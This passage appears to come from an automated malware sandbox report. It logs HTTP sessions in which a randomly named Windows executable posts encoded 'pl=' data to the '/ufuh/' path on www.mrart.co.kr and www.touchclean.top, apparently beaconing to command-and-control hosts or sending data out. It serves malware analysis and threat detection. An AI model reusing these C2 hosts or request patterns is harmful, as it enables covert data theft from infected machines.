                                                                                            Data Raw: 70 6c 3d 51 46 71 4d 4f 53 41 54 44 74 46 4d 53 4d 77 71 72 69 6e 30 42 55 56 7a 44 6d 38 6f 73 71 61 56 59 4e 78 2b 53 77 69 77 79 46 35 68 58 30 70 6f 75 57 55 4b 78 6c 54 64 46 54 79 6e 36 7a 4b 6f 61 73 51 6f 68 70 48 61 69 52 4f 65 67 65 70 56 38 54 6b 44 58 62 6e 5a 31 77 75 46 4a 74 64 35 45 6a 46 38 6e 68 72 79 52 75 30 30 33 50 35 75 73 72 4d 63 48 46 73 34 63 66 30 6d 37 32 76 32 76 31 72 55 70 6c 6d 65 73 4a 2b 54 6b 54 57 66 53 42 52 5a 4a 48 41 2f 51 6e 49 6a 38 78 2b 66 4a 74 47 6c 2f 6e 64 65 36 6a 75 50 52 41 69 36 6c 39 68 2b 67 66 72 55 44 64 43 56 46 33 2b 4e 34 41 3d 3d
                                                                                            Data Ascii: pl=QFqMOSATDtFMSMwqrin0BUVzDm8osqaVYNx+SwiwyF5hX0pouWUKxlTdFTyn6zKoasQohpHaiROegepV8TkDXbnZ1wuFJtd5EjF8nhryRu003P5usrMcHFs4cf0m72v2v1rUplmesJ+TkTWfSBRZJHA/QnIj8x+fJtGl/nde6juPRAi6l9h+gfrUDdCVF3+N4A==
                                                                                            May 2, 2024 08:28:35.684334993 CEST1289INHTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:28:35 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding,Cookie
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://mrart.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                            Content-Encoding: gzip
                                                                                            Data Raw: 31 39 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 3d 6b 8f dc 46 72 9f 2d e0 fe 43 2f 05 69 67 4e 24 87 e4 3c 76 76 76 67 75 3a 59 be 73 e2 3b 19 5a 19 87 83 24 2c 7a c8 9e 19 4a 1c 92 26 39 fb b8 f5 02 ce 9d 12 5c 62 03 f9 60 1b 30 12 1b 30 72 97 7c f2 87 c4 b9 03 1c 20 f9 43 d2 fa 3f a4 aa 9b 8f 1e 0e e7 b1 0f 1d 10 20 6b ed ec b0 bb ba aa ba ba aa ba aa 9b dd de dd 78 fb e1 fd c7 bf 7e ff 01 19 27 13 6f ef 47 37 76 f1 2f f1 a8 3f ea 2b 2f 02 ed af 1f 29 bc 90 51 07 fe be b5 3b 61 09 25 f6 98 46 31 4b fa ca 07 8f df d1 ba 4a 51 e1 d3 09 eb 2b 87 2e 3b 0a 83 28 51 88 1d f8 09 f3 01 f0 c8 75 92 71 df 61 87 ae cd 34 fe a0 12 d7 77 13 97 7a 5a 6c 53 8f f5 4d 81 c6 73 fd 17 24 62 5e 5f 09 a3 60 e8 7a 4c 21 e3 88 0d fb ca 38 49 c2 5e a3 31 9a 84 23 3d 88 46 8d e3 a1 df 30 cd 32 ed cd 28 18 04 49 bc 99 53 de f4 03 d7 77 d8 b1 4a 86 81 e7 05 47 9b a4 b1 77 03 9a 6c 68 1a 79 3c 76 63 12 bb 09 23 f0 37 08 13 77 e2 fe 86 39 e4 c8 4d c6 24 19 33 f2 eb 80 c6 09 d9 7f f0 90 84 de 74 e4 fa e4 d0 b2 74 93 68 04 [TRUNCATED]
                                                                                            Data Ascii: 19e3=kFr-C/igN$<vvvgu:Ys;Z$,zJ&9\b`00r| C? kx~'oG7v/?+/)Q;a%F1KJQ+.;(Quqa4wzZlSMs$b^_`zL!8I^1#=F02(ISwJGwlhy<vc#7w9M$3tthy`8"'X7hY 7t$wxxy~/^'<hd(9+(0I/&X8$A_HQj(qj<aB4q9w<}c&TE4+{O8D)TEU~" {Oi`XJM"/#64A%noi7Ua+Z|_s12_wAEFs3BUX$:y!=}&Gs&qp)E>&3UqLA+gjCK+\kPYLNF9UT#"RB-54ZBhyWo?QSY*m+NT1sGcf{L0y7n
                                                                                            May 2, 2024 08:28:35.684401035 CEST1289INData Raw: 79 c8 12 7b bc 29 26 92 cd 19 7a 7c 3a 58 d9 60 08 b2 8b f5 51 10 8c 3c 46 43 37 46 97 5f 6a a9 50 0f 54 de 47 73 aa f0 6f 51 1c df 39 9e 78 50 85 ce 78 a9 ab 24 b7 23 fa e1 34 d8 21 3f 7c fe df af 3f fb 4a 9e fe ca b2 1a 32 e6 34 94 37 cd c7 eb
                                                                                            Data Ascii: y{)&z|:X`Q<FC7F_jPTGsoQ9xPx$#4!?|?J247O?{kB2_3}w9=T1xr{=!?n8:8B6,IONOO~P)iln<mlY[SC1y.rl@9F6o068o%i=Et}:Hy
                                                                                            May 2, 2024 08:28:35.684550047 CEST1289INData Raw: 67 da ab c2 9c 37 40 09 51 75 ab 5a 14 c6 5b 8d b1 a8 2f e1 ae ef 5c 19 df 86 04 81 8c 42 4f c1 1d a0 37 3e e9 6f 98 f0 14 e1 d7 fb d4 f3 06 d4 7e 21 db ba 0c 68 9c cd 89 b5 88 63 2a aa b8 d2 56 33 ff d1 47 b5 12 51 18 d7 1a c3 9e f0 30 fc a3 8f
                                                                                            Data Ascii: g7@QuZ[/\BO7>o~!hc*V3GQ0R ~7xo[8J.}BMVY]]1Z'aP^qrC~^CBf63Z0OT99[=lc-SAeI{dR]
                                                                                            May 2, 2024 08:28:35.684637070 CEST1289INData Raw: c2 60 84 4c 66 b0 04 47 64 8f e8 3c b9 f3 d8 30 39 85 12 8a a6 08 df 77 44 6a 98 c5 dc 71 02 49 16 60 2a 15 33 4c fa ac 95 c8 23 34 f1 0c 3b 7f a8 46 8f 98 2a 08 18 2b d0 db e0 2f 58 74 9a b6 44 ee 7b 3c c1 92 13 ce b4 32 12 ce a6 5c 3b 87 df 0e
                                                                                            Data Ascii: `LfGd<09wDjqI`*3L#4;F*+/XtD{<2\;8(QT7.T!Kj3+WOZ\qH0!r;o1<U+;>~i~hG-~p46'0qn4_APpO0e<g9}H?vG4Su\jZ
                                                                                            May 2, 2024 08:28:35.684652090 CEST1289INData Raw: ce af 8f 11 97 d0 d0 ac 22 7e e1 86 1a 57 30 71 98 4b c3 53 2a 98 de e2 e9 f3 54 bb 6e 4e a8 eb 2b 7b fb 00 4a 92 20 1b dc dd 06 e5 82 e0 d7 ed b0 88 d3 9c d0 38 c1 c7 9c 2e f7 11 29 80 42 a2 00 fd d5 80 fa e0 72 14 d1 18 b9 cd 78 e4 60 4a 2a dd
                                                                                            Data Ascii: "~W0qKS*TnN+{J 8.)Brx`J*ed#/@W~zgs!-f@Fgdr^PbM-4*\J:#[H4aRQ84a]\V]QB<G#'~D'-M}$uGA$ylAQ{k.@
                                                                                            May 2, 2024 08:28:35.684669018 CEST593INData Raw: e5 f7 e7 ff f4 f9 46 65 b8 9d 7d 2e 19 c1 d6 ff d5 11 14 f7 5e 8a 41 0c 16 0e 62 76 e9 a5 c8 0f 57 00 1d 1c a4 df 30 93 c2 3b 50 3c 86 0e 11 17 4d d7 6e aa e1 62 b1 b2 44 2b e6 5b 88 65 b3 eb 52 8d 9b 19 5a b3 5a 49 ce bf fe 92 5c 84 3b 3a 05 ef
                                                                                            Data Ascii: Fe}.^AbvW0;P<MnbD+[eRZZI\;:/={?1>~o**IQkwB(fji1j9N+e0^Db|>V^N+"U"?JUE(!5D,0XJM_~|*]wq<
                                                                                            May 2, 2024 08:28:35.686428070 CEST20INData Raw: 61 0d 0a 03 00 09 83 4c 10 53 64 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: aLSd0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            20192.168.2.2249184183.111.183.31802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:28:38.723397017 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.mrart.co.kr
                                                                                            Origin: http://www.mrart.co.kr
                                                                                            Referer: http://www.mrart.co.kr/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 51 46 71 4d 4f 53 41 54 44 74 46 4d 54 74 41 71 70 46 54 30 55 45 56 79 49 47 38 6f 6d 4b 62 63 59 4e 4e 2b 53 78 6d 67 79 33 31 68 58 48 52 6f 74 77 67 4b 38 46 54 64 4f 7a 79 72 31 54 4c 7a 61 73 46 5a 68 73 6a 6b 69 58 65 65 68 39 52 56 36 52 38 45 50 62 6e 62 6b 41 75 47 4a 74 64 57 45 6a 56 34 6e 68 2f 63 52 75 38 30 33 35 4e 75 75 62 4d 66 4c 6c 73 34 63 66 31 70 37 32 76 7a 76 31 7a 79 70 6b 2f 46 73 2b 47 54 6b 78 65 66 65 47 6c 59 4c 48 41 37 4f 58 4a 79 38 77 58 51 46 76 32 74 78 47 30 39 38 53 44 70 56 54 75 2b 76 2b 5a 2f 67 2b 6e 50 63 70 6a 4c 46 6e 54 6f 72 74 47 6e 6a 69 79 34 38 71 7a 6a 56 5a 44 76 6b 45 38 34 36 70 6e 62 58 56 50 32 56 4c 55 56 36 79 4e 72 51 68 63 59 4c 41 58 70 62 59 53 59 54 50 43 77 56 77 63 35 30 54 32 48 71 59 33 4b 74 6c 4b 33 7a 34 59 31 38 62 75 31 6e 63 72 45 48 65 50 4c 54 68 39 63 50 6e 5a 6b 63 75 55 76 2f 39 6e 59 6c 74 4d 78 56 74 41 63 47 41 5a 62 35 74 67 74 5a 73 4a 72 58 74 69 45 70 4d 63 49 56 4e 4a 36 6a 58 33 41 71 34 52 4c 59 7a 62 [TRUNCATED]
                                                                                            Data Ascii: pl=QFqMOSATDtFMTtAqpFT0UEVyIG8omKbcYNN+Sxmgy31hXHRotwgK8FTdOzyr1TLzasFZhsjkiXeeh9RV6R8EPbnbkAuGJtdWEjV4nh/cRu8035NuubMfLls4cf1p72vzv1zypk/Fs+GTkxefeGlYLHA7OXJy8wXQFv2txG098SDpVTu+v+Z/g+nPcpjLFnTortGnjiy48qzjVZDvkE846pnbXVP2VLUV6yNrQhcYLAXpbYSYTPCwVwc50T2HqY3KtlK3z4Y18bu1ncrEHePLTh9cPnZkcuUv/9nYltMxVtAcGAZb5tgtZsJrXtiEpMcIVNJ6jX3Aq4RLYzbaKx2vBw/CrC8SD83hLF0RUyFsGft+o8RITmH6J+HECm2ckrc/ayNNKiUMMphdU9ZqY2LMPmZ+qek2edrzZZ0MGm+HwCmXvq+qfd6vn3CBgo7dmUjM5k1VzFy7AP8E/ivnXVTOBgbhgFgLmHCIS4Pqx0PbxTQMgGtEq03VtR7YLjrKP/exlVw+rgPFmva0zNZCTpeam4KIWBhvzs/DKCQXDK1+9Jno+aokSku2qejmID26HT2nqgDq36AgzOCa0Tq9MOyW3IarkVDAdweJZl6AeoOegeuwJWPnKuTFpGLb7EaSi/iuzmfFDzqxEKcUQThCf7I+/Mp3raN157cD69AUn8V5dpOrBgdtK/Sd8rPTUfI4CsPAnHAq4ioovdNi08RDskpUOZ2XYNgr8+oS9vwTEbAhH3Lypdcaf19UxwaNdb6cS25pba1rTCfGtGQjCbpT0I6OuGkInhu1cUSjG68GRdv45vlie+OJtzW4fK4QztDGOaVO88ebt8KBdKFB9XMoxFM51Af/SLuY4jedme2mMSSExtEtKdL01TNm1cJNHruLya8zEYQ72nNJVgyOIIIoxldFPvtK6AfvCgz3OKuIQ+T6h1sS7JtYiiJWcvIF1iMjnFbtphuWFQQeXOQ88D7pmBlAs7A3o+cykBy+O7hn/YaceDUt5qnOZ [TRUNCATED]
                                                                                            May 2, 2024 08:28:39.020313978 CEST1564OUTData Raw: 69 49 67 68 51 62 42 6e 2f 76 72 4b 56 63 43 69 43 52 46 49 78 70 74 48 54 5a 44 63 5a 44 72 56 38 54 66 58 63 39 4a 78 71 2f 34 43 76 6b 73 33 57 30 79 52 65 77 45 38 39 2b 48 38 77 33 56 71 79 44 39 48 54 45 6c 71 49 35 70 6b 70 41 4d 34 4d 72
                                                                                            Data Ascii: iIghQbBn/vrKVcCiCRFIxptHTZDcZDrV8TfXc9Jxq/4Cvks3W0yRewE89+H8w3VqyD9HTElqI5pkpAM4Mr3QLb7BRMiwIrjCAY/avvwfyxZ7VCoI5unheAKVcC7BGHpjYZ9eClwljeg9ypTNERctsoRv0+YhcZu1PVZ/jHyHSLpyT4Z9R6GmVbF2FJl0g8qJyBxzrHjRukU3moo1inuwvLHsxA5TmQ9Zc2hx6EE0v52s9jxfslN
                                                                                            May 2, 2024 08:28:39.597989082 CEST1289INHTTP/1.1 404 Not Found
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:28:39 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding
                                                                                            Vary: Accept-Encoding,Cookie
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            Link: <https://mrart.co.kr/wp-json/>; rel="https://api.w.org/"
                                                                                            Content-Encoding: gzip
                                                                                            Data Raw: 31 39 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 3d 6b 8f dc 46 72 9f 2d e0 fe 43 2f 05 69 67 4e 24 87 e4 3c 76 76 76 67 75 3a 59 be 73 e2 3b 19 5a 19 87 83 24 2c 7a c8 9e 19 4a 1c 92 26 39 fb b8 f5 02 ce 9d 12 5c 62 03 f9 60 1b 30 12 1b 30 72 97 7c f2 87 c4 b9 03 1c 20 f9 43 d2 fa 3f a4 aa 9b 8f 1e 0e e7 b1 0f 1d 10 20 6b ed ec b0 bb ba aa ba ba aa ba aa 9b dd de dd 78 fb e1 fd c7 bf 7e ff 01 19 27 13 6f ef 47 37 76 f1 2f f1 a8 3f ea 2b 2f 02 ed af 1f 29 bc 90 51 07 fe be b5 3b 61 09 25 f6 98 46 31 4b fa ca 07 8f df d1 ba 4a 51 e1 d3 09 eb 2b 87 2e 3b 0a 83 28 51 88 1d f8 09 f3 01 f0 c8 75 92 71 df 61 87 ae cd 34 fe a0 12 d7 77 13 97 7a 5a 6c 53 8f f5 4d 81 c6 73 fd 17 24 62 5e 5f 09 a3 60 e8 7a 4c 21 e3 88 0d fb ca 38 49 c2 5e a3 31 9a 84 23 3d 88 46 8d e3 a1 df 30 cd 32 ed cd 28 18 04 49 bc 99 53 de f4 03 d7 77 d8 b1 4a 86 81 e7 05 47 9b a4 b1 77 03 9a 6c 68 1a 79 3c 76 63 12 bb 09 23 f0 37 08 13 77 e2 fe 86 39 e4 c8 4d c6 24 19 33 f2 eb 80 c6 09 d9 7f f0 90 84 de 74 e4 fa e4 d0 b2 74 93 68 04 [TRUNCATED]
                                                                                            Data Ascii: 19e3=kFr-C/igN$<vvvgu:Ys;Z$,zJ&9\b`00r| C? kx~'oG7v/?+/)Q;a%F1KJQ+.;(Quqa4wzZlSMs$b^_`zL!8I^1#=F02(ISwJGwlhy<vc#7w9M$3tthy`8"'X7hY 7t$wxxy~/^'<hd(9+(0I/&X8$A_HQj(qj<aB4q9w<}c&TE4+{O8D)TEU~" {Oi`XJM"/#64A%noi7Ua+Z|_s12_wAEFs3BUX$:y!=}&Gs&qp)E>&3UqLA+gjCK+\kPYLNF9UT#"RB-54ZBhyWo?QSY*m+NT1sGcf{L0y7n
                                                                                            May 2, 2024 08:28:39.598010063 CEST1289INData Raw: 79 c8 12 7b bc 29 26 92 cd 19 7a 7c 3a 58 d9 60 08 b2 8b f5 51 10 8c 3c 46 43 37 46 97 5f 6a a9 50 0f 54 de 47 73 aa f0 6f 51 1c df 39 9e 78 50 85 ce 78 a9 ab 24 b7 23 fa e1 34 d8 21 3f 7c fe df af 3f fb 4a 9e fe ca b2 1a 32 e6 34 94 37 cd c7 eb
                                                                                            Data Ascii: y{)&z|:X`Q<FC7F_jPTGsoQ9xPx$#4!?|?J247O?{kB2_3}w9=T1xr{=!?n8:8B6,IONOO~P)iln<mlY[SC1y.rl@9F6o068o%i=Et}:Hy
                                                                                            May 2, 2024 08:28:39.598072052 CEST1289INData Raw: 67 da ab c2 9c 37 40 09 51 75 ab 5a 14 c6 5b 8d b1 a8 2f e1 ae ef 5c 19 df 86 04 81 8c 42 4f c1 1d a0 37 3e e9 6f 98 f0 14 e1 d7 fb d4 f3 06 d4 7e 21 db ba 0c 68 9c cd 89 b5 88 63 2a aa b8 d2 56 33 ff d1 47 b5 12 51 18 d7 1a c3 9e f0 30 fc a3 8f
                                                                                            Data Ascii: g7@QuZ[/\BO7>o~!hc*V3GQ0R ~7xo[8J.}BMVY]]1Z'aP^qrC~^CBf63Z0OT99[=lc-SAeI{dR]
                                                                                            May 2, 2024 08:28:39.598154068 CEST1289INData Raw: c2 60 84 4c 66 b0 04 47 64 8f e8 3c b9 f3 d8 30 39 85 12 8a a6 08 df 77 44 6a 98 c5 dc 71 02 49 16 60 2a 15 33 4c fa ac 95 c8 23 34 f1 0c 3b 7f a8 46 8f 98 2a 08 18 2b d0 db e0 2f 58 74 9a b6 44 ee 7b 3c c1 92 13 ce b4 32 12 ce a6 5c 3b 87 df 0e
                                                                                            Data Ascii: `LfGd<09wDjqI`*3L#4;F*+/XtD{<2\;8(QT7.T!Kj3+WOZ\qH0!r;o1<U+;>~i~hG-~p46'0qn4_APpO0e<g9}H?vG4Su\jZ
                                                                                            May 2, 2024 08:28:39.598165989 CEST1289INData Raw: ce af 8f 11 97 d0 d0 ac 22 7e e1 86 1a 57 30 71 98 4b c3 53 2a 98 de e2 e9 f3 54 bb 6e 4e a8 eb 2b 7b fb 00 4a 92 20 1b dc dd 06 e5 82 e0 d7 ed b0 88 d3 9c d0 38 c1 c7 9c 2e f7 11 29 80 42 a2 00 fd d5 80 fa e0 72 14 d1 18 b9 cd 78 e4 60 4a 2a dd
                                                                                            Data Ascii: "~W0qKS*TnN+{J 8.)Brx`J*ed#/@W~zgs!-f@Fgdr^PbM-4*\J:#[H4aRQ84a]\V]QB<G#'~D'-M}$uGA$ylAQ{k.@
                                                                                            May 2, 2024 08:28:39.598189116 CEST593INData Raw: e5 f7 e7 ff f4 f9 46 65 b8 9d 7d 2e 19 c1 d6 ff d5 11 14 f7 5e 8a 41 0c 16 0e 62 76 e9 a5 c8 0f 57 00 1d 1c a4 df 30 93 c2 3b 50 3c 86 0e 11 17 4d d7 6e aa e1 62 b1 b2 44 2b e6 5b 88 65 b3 eb 52 8d 9b 19 5a b3 5a 49 ce bf fe 92 5c 84 3b 3a 05 ef
                                                                                            Data Ascii: Fe}.^AbvW0;P<MnbD+[eRZZI\;:/={?1>~o**IQkwB(fji1j9N+e0^Db|>V^N+"U"?JUE(!5D,0XJM_~|*]wq<
                                                                                            May 2, 2024 08:28:39.598491907 CEST20INData Raw: 61 0d 0a 03 00 09 83 4c 10 53 64 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: aLSd0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            21192.168.2.2249185183.111.183.31802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:28:41.519541979 CEST464OUTGET /ufuh/?pl=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR+z/FEUJE9molBo2WPCHkLm6APtf7MOscmEgy++mrhWyRAZYaHU6QWLXqtmVhlHsy7bZNd62MlyuoEIWFEUa6hs&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.mrart.co.kr
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            May 2, 2024 08:28:42.050122976 CEST502INHTTP/1.1 301 Moved Permanently
                                                                                            Server: openresty
                                                                                            Date: Thu, 02 May 2024 06:28:41 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 0
                                                                                            Connection: close
                                                                                            Vary: Accept-Encoding,Cookie
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            X-Redirect-By: WordPress
                                                                                            Location: http://mrart.co.kr/ufuh/?pl=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR+z/FEUJE9molBo2WPCHkLm6APtf7MOscmEgy++mrhWyRAZYaHU6QWLXqtmVhlHsy7bZNd62MlyuoEIWFEUa6hs&5h1t=6H6PKFvXjtI4u8k


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            22192.168.2.224918667.223.117.189802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:28:47.335522890 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.touchclean.top
                                                                                            Origin: http://www.touchclean.top
                                                                                            Referer: http://www.touchclean.top/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 4e 2b 33 77 63 4a 70 43 55 69 65 51 4c 33 67 4f 52 46 57 43 64 35 35 4f 33 2f 35 73 4b 4e 6e 56 30 68 51 30 46 53 39 43 43 4c 64 69 37 52 33 78 49 47 50 35 54 70 55 67 63 49 64 53 33 55 5a 4f 33 64 47 65 71 59 61 72 6c 30 6e 77 4f 57 77 37 52 35 4d 50 35 54 59 73 43 57 6d 77 6f 66 4c 43 6f 4a 4d 37 6c 50 73 41 54 55 33 47 4a 30 4f 5a 6f 4d 7a 37 35 58 58 74 5a 30 38 38 75 33 73 38 78 55 32 34 57 64 71 4a 6a 47 37 62 79 64 63 47 65 52 6e 6e 72 46 6d 53 72 72 74 2b 41 2f 67 6b 4a 35 37 39 6f 7a 75 2b 4f 66 71 74 47 2b 75 47 65 59 35 45 73 30 5a 44 61 42 44 30 32 31 62 46 2b 34 41 79 4e 72 64 4a 39 46 39 4d 31 56 4f 39 67 68 4a 36 47 62 6d 78 41 6c 36 75 4b 4b 46 6b 5a 45 31 62 62 48 70 55 4a 62 63 68 4d 49 43 6e 51 6c 39 39 4e 36 43 7a 75 43 47 4e 6f 35 42 6a 71 38 77 39 2f 4d 4c 44 36 78 77 2f 57 47 71 62 4f 58 34 4f 5a 34 61 4d 30 36 66 56 2b 7a 70 76 72 63 39 62 62 36 39 45 66 6e 52 73 50 74 35 73 53 45 66 74 59 43 35 5a 2b 31 2f 31 6c 73 57 58 4c 61 32 46 41 75 5a 33 52 2f 48 79 37 57 45 [TRUNCATED]
                                                                                            Data Ascii: pl=N+3wcJpCUieQL3gORFWCd55O3/5sKNnV0hQ0FS9CCLdi7R3xIGP5TpUgcIdS3UZO3dGeqYarl0nwOWw7R5MP5TYsCWmwofLCoJM7lPsATU3GJ0OZoMz75XXtZ088u3s8xU24WdqJjG7bydcGeRnnrFmSrrt+A/gkJ579ozu+OfqtG+uGeY5Es0ZDaBD021bF+4AyNrdJ9F9M1VO9ghJ6GbmxAl6uKKFkZE1bbHpUJbchMICnQl99N6CzuCGNo5Bjq8w9/MLD6xw/WGqbOX4OZ4aM06fV+zpvrc9bb69EfnRsPt5sSEftYC5Z+1/1lsWXLa2FAuZ3R/Hy7WESbOz1rZEFypABPCaGayEwAKBD8xd60o+ipvesA9BfzY7jt9dL3paNfQADDGYgWP8Hc3iTrWR5knMZGM5G49+2PMnJIPiBJU90dam3KpYG9bFexFA8Ly4vAcFGwtMaKc4EQKzdEazV+rD9QLK7EEg2nPUVjaoQs0LTtNpoo7r5alOIAe6b9nkaa41uYAuXVsR80T5O1rkf6cstYxWCHdilWPE1jLFrfeq7NktM4fU27RdtFDX6kkunYeBRqbedpYg9gJdgjUxwokMm8GsDzLXYw496nor6ZuYD1HI4paFEOJLTWrrsB6MxTAXdE6uWtDfB0AKWqIjd740xhb8CyuS246kKYkY7rzZR5r9lj+JioYeLI5YDKjaHr7LtkiwxkpGPAEu8zQbitnPS+zeebPkqjWJ52bqPqrMM4iI+ePTFSZikjGtgl3P0K7XgB2DwGUaId+gCePcO7KxKlH6ldu16rRzpEdgY/1QNVKucSq4MXcv63hzHSBghooxq96g/ljmja3wt6v3vUB2kEelZZ3HvIyG1ORdR4pHh59LNVoQujcbMQltmBNDoGl9suF+3IuFVSRXntsrfGataSeb/xqy293xPwed1IAQs0ce2wDgLmwE7omMa7iaCN0krGqLhe61OzOTj9Sqi1gkuQp0Xj8fxy28I30/z17exS [TRUNCATED]
                                                                                            May 2, 2024 08:28:47.488858938 CEST109OUTData Raw: 43 42 53 68 4d 57 55 31 76 71 50 76 55 37 59 57 71 42 76 56 39 44 41 58 7a 39 4b 71 36 33 48 4c 54 51 55 73 6a 35 70 2b 66 37 56 74 37 5a 73 48 79 75 2f 45 5a 65 59 52 77 63 4a 64 70 41 74 42 50 67 37 34 41 31 42 54 58 70 66 77 70 69 63 66 73 2b
                                                                                            Data Ascii: CBShMWU1vqPvU7YWqBvV9DAXz9Kq63HLTQUsj5p+f7Vt7ZsHyu/EZeYRwcJdpAtBPg74A1BTXpfwpicfs+UEtBYWbY1SauNxBES9zLrT68s6r
                                                                                            May 2, 2024 08:28:47.827896118 CEST169INHTTP/1.0 500 Internal Server Error
                                                                                            Date: Thu, 02 May 2024 06:28:47 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 0
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=UTF-8


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            23192.168.2.224918767.223.117.189802848C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            May 2, 2024 08:28:56.619167089 CEST726OUTPOST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.touchclean.top
                                                                                            Origin: http://www.touchclean.top
                                                                                            Referer: http://www.touchclean.top/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Raw: 70 6c 3d 4e 2b 33 77 63 4a 70 43 55 69 65 51 4c 77 30 4f 54 51 71 43 4d 70 35 4f 36 66 35 73 42 74 6e 54 30 68 64 4a 46 57 6c 73 42 36 56 69 37 41 48 78 49 55 6e 35 65 4a 55 6a 53 6f 64 57 7a 55 5a 62 33 64 47 34 71 5a 6d 72 6c 30 44 77 55 31 49 37 59 63 73 4f 37 6a 59 75 50 32 6d 7a 6f 66 33 78 6f 4a 42 6c 6c 50 30 41 54 55 48 47 49 33 32 5a 74 76 4c 37 39 6e 57 6d 52 55 38 52 75 33 78 6b 78 55 6d 4b 57 63 57 4a 6a 7a 6a 62 79 4d 38 47 55 69 50 6e 69 6c 6d 54 6c 4c 74 70 4f 71 42 56 47 5a 69 32 68 53 47 47 48 4f 66 4f 46 74 57 38 58 35 68 76 76 47 30 75 56 32 71 73 31 55 47 39 71 67 3d 3d
                                                                                            Data Ascii: pl=N+3wcJpCUieQLw0OTQqCMp5O6f5sBtnT0hdJFWlsB6Vi7AHxIUn5eJUjSodWzUZb3dG4qZmrl0DwU1I7YcsO7jYuP2mzof3xoJBllP0ATUHGI32ZtvL79nWmRU8Ru3xkxUmKWcWJjzjbyM8GUiPnilmTlLtpOqBVGZi2hSGGHOfOFtW8X5hvvG0uV2qs1UG9qg==
